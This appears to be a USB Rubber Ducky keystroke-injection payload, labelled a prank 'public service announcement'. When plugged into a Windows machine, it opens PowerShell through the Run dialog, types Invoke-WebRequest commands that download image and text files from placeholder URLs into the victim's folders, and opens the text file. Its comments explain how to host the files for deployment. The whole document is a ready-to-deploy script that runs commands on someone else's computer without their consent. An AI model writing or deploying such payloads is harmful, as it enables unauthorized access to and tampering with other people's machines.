Path: blob/master/payloads/library/prank/PUBLIC-SERVICE-ANNOUNCEMENT/PSA.txt
2968 views
REM PUBLIC-SERVICE-ANNOUCEMENT1REM (or (EAS)ter-eggs)2REM By Lumen3REM Warns the user of the danger of ducks!4DEFINE EGG1 example.com/egg1.png5DEFINE EGG2 example.com/egg2.png6DEFINE EGG3 example.com/egg3.png7DEFINE EGG4 example.com/egg5.png8DEFINE TEXTFILE example.com/a_friendly_psa.txt9REM See below for how to configure these URLs10DELAY 50011GUI r12DELAY 30013STRING powershell14DELAY 30015ENTER16DELAY 60017STRING Invoke-WebRequest -Uri "18STRING TEXTFILE19STRING " -OutFile "~\Desktop\a_friendly_psa.txt"; Invoke-WebRequest -Uri "20STRING EGG121STRING " -OutFile "~\Documents\egg1.png"; Invoke-WebRequest -Uri "22STRING EGG223STRING " -OutFile "~\Pictures\egg2.png"; Invoke-WebRequest -Uri "24STRING EGG325STRING " -OutFile "~\Documents\My Games\egg3.png"; Invoke-WebRequest -Uri "26STRING EGG427STRING " -OutFile "~\Downloads\egg5.png"; & ~\Desktop\a_friendly_psa.txt28ENTER29REM This script makes heavy use of the Invoke-WebRequest command, which30REM gathers a webpage and optionally saves it31REM Here, we use it to give the user a nice warning about security :D32REM This script hides 4 eggs, gives a little warning, and may33REM or may not send them on a quest for a mythical 5th egg ¯\_(ツ)_/¯34REM These statements can be removed to save on space, and the links above35REM can be changed to short links to save on typing time3637REM To set up the URLs for deployment, use a file share service to host38REM the 4 images and text files that come with this payload.39REM Any file share can be used as long as it offers a link40REM directly to the file that can be saved or downloaded41REM (for example, a dropbox link with ?dl=1 at the end)424344